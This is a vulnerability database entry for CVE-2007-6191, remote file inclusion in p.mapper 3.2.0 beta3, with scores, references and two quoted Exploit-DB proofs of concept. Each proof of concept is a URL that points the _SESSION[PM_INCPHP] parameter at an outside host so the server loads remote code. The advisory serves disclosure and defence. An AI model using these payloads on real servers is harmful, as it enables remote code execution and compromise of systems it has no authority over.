CVE-2007-6191
published 2007-11-30CVE-2007-6191: Multiple PHP remote file inclusion vulnerabilities in Armin Burger p.mapper 3.2.0 beta3 allow remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP337medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.19%
80.2th percentile
Multiple PHP remote file inclusion vulnerabilities in Armin Burger p.mapper 3.2.0 beta3 allow remote attackers to execute arbitrary PHP code via a URL in the _SESSION[PM_INCPHP] parameter to (1) incphp/globals.php or (2) plugins/export/mc_table.php. NOTE: it could be argued that this vulnerability is caused by a problem in PHP and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in p.mapper.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pmapper | p.mapper | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
p.mapper 3.2 beta3 - '/incPHP/globals.php?_SESSION[PM_INCPHP]' Remote File Inclusion
exploitdb·2007-11-27
CVE-2007-6191 p.mapper 3.2 beta3 - '/incPHP/globals.php?_SESSION[PM_INCPHP]' Remote File Inclusion
p.mapper 3.2 beta3 - '/incPHP/globals.php?_SESSION[PM_INCPHP]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/26614/info
p.mapper is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect p.mapper 3.2.0 beta3; other versions may also be vulnerable.
http://www.example.com/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=http://www.example2.com
Exploit-DB
p.mapper 3.2 beta3 - '/plugins/export/mc_table.php?_SESSION[PM_INCPHP]' Remote File Inclusion
exploitdb·2007-11-27
CVE-2007-6191 p.mapper 3.2 beta3 - '/plugins/export/mc_table.php?_SESSION[PM_INCPHP]' Remote File Inclusion
p.mapper 3.2 beta3 - '/plugins/export/mc_table.php?_SESSION[PM_INCPHP]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/26614/info
p.mapper is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect p.mapper 3.2.0 beta3; other versions may also be vulnerable.
http://www.example.com/pmapper-3.2-beta3/plugins/export/mc_table.php?_SESSION[PM_INCPHP]=http://www.example2.com
No writeups or analysis indexed.
http://secunia.com/advisories/27876http://www.packetstormsecurity.org/0711-exploits/pmapper-rfi.txthttp://www.securityfocus.com/bid/26614https://exchange.xforce.ibmcloud.com/vulnerabilities/38732http://secunia.com/advisories/27876http://www.packetstormsecurity.org/0711-exploits/pmapper-rfi.txthttp://www.securityfocus.com/bid/26614https://exchange.xforce.ibmcloud.com/vulnerabilities/38732
2007-11-30
Published